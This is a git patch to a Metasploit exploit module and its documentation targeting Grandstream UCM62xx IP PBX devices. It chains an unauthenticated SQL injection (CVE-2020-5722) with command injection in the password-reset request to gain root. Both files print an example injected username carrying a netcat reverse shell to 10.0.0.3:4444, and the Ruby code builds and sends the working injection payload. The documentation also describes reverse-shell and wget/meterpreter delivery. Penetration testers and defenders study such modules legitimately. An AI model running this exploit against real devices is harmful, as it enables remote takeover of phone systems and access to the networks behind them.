From 2c989ec714607854767bafb4eabb5760db9ecfa0 Mon Sep 17 00:00:00 2001 From: Jake Baines Date: Sat, 22 Jan 2022 14:09:58 -0800 Subject: [PATCH] Addressed multiple review comments (spelling, doc details, randomization, etc) --- .../http/grandstream_ucm62xx_sendemail_rce.md | 32 ++++++++++---- .../http/grandstream_ucm62xx_sendemail_rce.rb | 43 +++++++++++-------- 2 files changed, 48 insertions(+), 27 deletions(-) diff --git a/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md b/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md index 92232f4ef7..626d2728d6 100644 --- a/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md +++ b/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md @@ -2,21 +2,35 @@ ### Description -This module exploits unauthenticated SQL and command injection vulnerabilities affecting -the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an -unauthenticated and remote attacker to execute commands as root. This module affects -UCM62xx versions before firmware version 1.0.19.20. +This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and +a command injection vulnerability (technically, no assigned CVE but was inadvertently +patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX +series of devices. The vulnerabilities allow an unauthenticated and remote attacker to +execute commands as `root`. + +Exploitation happens in two stages: + +1. An SQL injection during username lookup while executing the "Forgot Password" function. +2. After successful SQL injection the user provided username is passed to a python script + via the shell. Like so: + +``` + /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ + password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 ` +``` + +This module affect UCM62xx versions before firmware version 1.0.19.20. ### Installation -The UCM62xx PBX is a physical device and is not known to be succesfully emulated. +The UCM62xx PBX is a physical device and is not known to have been successfully emulated. However, if you have a device, affected firmware can be downloaded here: * https://firmware.grandstream.com/Release_UCM62xx_1.0.18.13.zip ## Verification Steps -* Acquire an affected device and configure with affected firmware +* Acquire an affected device and configure it with the affected firmware * Do: `use exploit/linux/http/grandstream_ucm62xx_sendemail_rce` * Do: `set RHOST ` * Do: `check` @@ -30,11 +44,11 @@ However, if you have a device, affected firmware can be downloaded here: ### 0 -By default, this targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell. +This targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell. ### 1 -By default, this target obtains a meterpreter session using `wget`. +This target obtains a meterpreter session using `wget`. ## Options @@ -103,7 +117,7 @@ Revision : 63015 Serial : 1126b9d4eacb275c ``` -### Grandstream UCM6202 IP PBX fimrware version 1.0.18.13. Get reverse shell using netcat. +### Grandstream UCM6202 IP PBX firmware version 1.0.18.13. Get reverse shell using netcat. ``` msf6 > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce diff --git a/modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb b/modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb index c4fc5f5ffc..f4e50efaa4 100644 --- a/modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb +++ b/modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb @@ -16,10 +16,22 @@ class MetasploitModule < Msf::Exploit::Remote info, 'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE', 'Description' => %q{ - This module exploits unauthenticated SQL and command injection vulnerabilities affecting - the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an - unauthenticated and remote attacker to execute commands as root. This module affects - UCM62xx versions before firmware version 1.0.19.20. + This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and + a command injection vulnerability (technically, no assigned CVE but was inadvertently + patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX + series of devices. The vulnerabilities allow an unauthenticated and remote attacker to + execute commands as root. + + Exploitation happens in two stages: + + 1. An SQL injection during username lookup while executing the "Forgot Password" function. + 2. After successful SQL injection the user provided username is passed to a python script + via the shell. Like so: + + /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ + password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 ` + + This module affect UCM62xx versions before firmware version 1.0.19.20. }, 'License' => MSF_LICENSE, 'Author' => [ @@ -55,10 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'linux', 'Arch' => [ARCH_ARMLE], 'Type' => :linux_dropper, - 'CmdStagerFlavor' => [ 'wget' ], - 'DefaultOptions' => { - 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' - } + 'CmdStagerFlavor' => [ 'wget' ] } ] ], @@ -95,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote ### def check normalized_uri = normalize_uri(target_uri.path, '/cgi') - print_status("Requesting version information from #{normalized_uri}") + vprint_status("Requesting version information from #{normalized_uri}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalized_uri, @@ -107,20 +116,17 @@ class MetasploitModule < Msf::Exploit::Remote body_json = res.get_json_document return CheckCode::Unknown('No JSON in response') unless body_json - resp_json = body_json['response'] - return CheckCode::Unknown('The JSON response is missing the response element') unless resp_json + prog_version = body_json.dig('response', 'prog_version') + return false if prog_version.nil? - prog_version = resp_json['prog_version'] - return CheckCode::Unknown('The JSON response is missing the prog_version element') unless prog_version - - print_status("The reported version is: #{prog_version}") + vprint_status("The reported version is: #{prog_version}") version = Rex::Version.new(prog_version) if version < Rex::Version.new('1.0.19.20') - return CheckCode::Appears('This determination is based on the version string.') + return CheckCode::Appears("This determination is based on the version string: #{prog_version}.") end - return CheckCode::Safe('This determination is based on the version string.') + return CheckCode::Safe("This determination is based on the version string: #{prog_version}.") end ## @@ -136,13 +142,14 @@ class MetasploitModule < Msf::Exploit::Remote # payloads are appropriate. ### def execute_command(cmd, _opts = {}) + rand_num = Rex::Text.rand_text_numeric(1..5) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/cgi'), 'vars_post' => { 'action' => 'sendPasswordEmail', - 'user_name' => 'z\' or 1=1--`;`' + cmd + '`;`' + 'user_name' => "' or #{rand_num}=#{rand_num}--`;`#{cmd}`;`" } }, 5)